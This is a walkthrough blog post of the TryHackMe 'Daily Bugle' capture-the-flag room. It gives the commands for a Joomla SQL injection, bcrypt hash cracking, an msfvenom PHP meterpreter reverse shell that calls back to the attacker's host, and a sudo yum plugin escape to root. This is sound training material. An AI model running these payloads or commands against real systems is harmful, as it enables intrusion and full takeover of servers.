CHALLENGE OVERVIEW
- Link: https://tryhackme.com/room/dailybugle
- Difficulty: hard
- Target:
user
/root
flags - Highlight: leveraging sudo privileges on yum to gain persistent root access
- Tools used:
nmap
,dirb
,sqlmap
,hashcat
,gtfobins
- Tags: joomla, sqli, yum
BACKGROUND

This box is another black-box-style challenge with a few extra guiding questions.
We learn that the “Daily Bugle” reports front-page news about Spiderman robbing a bank. It’s our job to hack into the system to recover the user + root flags.
The tags joomla
, sqli
, and yum
also point us in the direction of the joomla
service, SQL injection, and leveraging user permissions on the yum binary to gain root access.

ENUMERATION/RECON

NMAP
sudo nmap -A -oN nmap-results.txt <$targetIP> -O
And we’ll follow that up with an nmap
script scan for more information about potential vulnerabilities:
nmap --script vuln -O -oN nmap-vuln.txt 10.10.239.203
Here is a snippet of interesting nmap
results:

DIRB
dirb <$targetIP>
A snippet of interesting dirb
scan results:

Notable findings include the hidden web directory (/administrator
) that has a login portal. We’ll keep this in mind for later on in the hack.
SQLMAP
Cross-referencing the vulnerability discovered by our nmap
vuln script scan in exploit-db
, we find a downloadable text exploit file with instructions to use sqlmap
.

I attempted to execute this exploit via Metasploit console but had no luck.

Plan B is to use sqlmap
with the command given in the text file from exploit-db
.
Our first attempt at using sqlmap
errors out, so we lower the risk variable and try again.

Our new command with risk=2
completes the job, but doesn’t turn up anything interesting.
Let’s search around for a different method to exploit this vulnerability.
INITIAL FOOTHOLD

We searched for Joomla 3.7.0 exploit and found a Python script. Let’s go ahead and use the following command to start the exploit:
python3 sqli.py http://<$targetIP>/index.php?component/users/?view=login?
Success! We extracted a username and a hashed password.
Output:
Extracting users from fb9j5_users
[$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
CRACK THAT HASH WITH HASHCAT

Let’s fire up hashcat
and start the cracking!
A quick google search for a hash identifier website helps us determine that the hashing method used is the bcrypt/Blowfish algorithm. I looked up the id number for this hash in the help for hashcat
and found it was -m 3200
.
I omitted this step from the video to save time and keep people watching.
Hashcat took 51 mins, 18 secs to crack the hash using rockyou.txt
for the wordlist. I also attempted to use John the Ripper to crack this hash, which was much slower than hashcat
on my machine.

After saving the hash string in a file “hash”, we can start let hashcat do the work from here.
hashcat -m 3200 --show hash
Results:
Session..........: hashcat
Status...........: Cracked
Hash.Name........: bcrypt $2*$, Blowfish (Unix)
Hash.Target......: $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p...BtZutm
Time.Started.....: Mon Jan 30 12:15:23 2023 (51 mins, 18 secs)
Time.Estimated...: Mon Jan 30 13:06:41 2023 (0 secs)
Guess.Base.......: File (/home/kalisurfer/hacking-tools/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 15 H/s (17.05ms) @ Accel:8 Loops:8 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests
Progress.........: 46848/14344384 (0.33%)
Rejected.........: 0/46848 (0.00%)
Restore.Point....: 46816/14344384 (0.33%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1016-1024
Candidates.#1....: sword -> smile4ever
Started: Mon Jan 30 12:15:18 2023
Stopped: Mon Jan 30 13:06:42 2023
The cracked hash was saved as a new file in the current directory. Now that we have our username and password we can go ahead and log in to that administrator portal we discovered earlier.
jonah:sp—--omitted—--23
Now that we are in the system as an administrator, we can modify the pages to add a revshell script. We’ll use the template for error.php
and change the payload to a reverse meterpreter shell.
CREATE A METERPRETER PAYLOAD

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.6.2.23 LPORT=2222 -f raw > rev.php
UPLOAD THE FILE IN TEMPLATES/ERROR.PHP
We’ll use the common text editor VIM to copy everything in the payload.php
file to our clipboard using the quick and easy command:
:%y+
%
– apply the next command to all linesy
– yank+
– copy to clipboard
And then :q!
to quit without saving.
CATCH A REVERSE METERPRETER SHELL
We’ll set up the meterpreter listener using the exploit (multi/handler) options, being careful to set the payload to the same payload that we used when running msfvenom
to create the malicious payload (payload = php/meterpreter_reverse_tcp
).
After catching the meterpreter shell, we’ll proceed to upload linpeas
and run it from the regular shell within Metasploit console. The password for jjameson
was discovered in plaintext.

LOGIN AS jjameson VIA SSH

Now that we presumably have a password login combo with jjameson
, let’s try connecting via ssh. It works, and we are in as jjameson
. Let’s grab the user flag and then continue on to privesc
.
EXPLOIT
cat user.txt 27—---omitted—------2e
PRIVILEGE ESCALATION
Let’s check sudo permissions with sudo -l
.

Checking GTFObins for yum, we find a pathway toward root privileges. All we have to do is cut and paste the following lines from GTFObins.
cat >$TF/y.py<<EOF import os import yum from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE requires_api_version='2.1' def init_hook(conduit): os.execl('/bin/sh','/bin/sh')
EOF
sudo yum -c $TF/x --enableplugin=y
POST-EXPLOITATION

Now we can recover the root flag in the usual spot: /root/root.txt
ee—---------omitted—----------79
FINAL THOUGHTS
Although this box has a difficulty rating of hard, I didn’t find it to be much more complex than some of the easy-rated boxes on TryHackMe. It did take a few extra hours to complete, so maybe length is a factor that they consider when determining difficulty ratings.
PERSONAL HACKING GOALS

My immediate goal is to get into the top 1% of hackers ranked on the platform. I’m currently in the top 2% and still need to surpass roughly 10,000 hackers before I can join the ranks in the top 1%.
Jumping from a new hacker to the top 3% seemed to happen very quickly. The jump to the top 2% took considerable effort, and the next jump seems exponentially more difficult.

I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.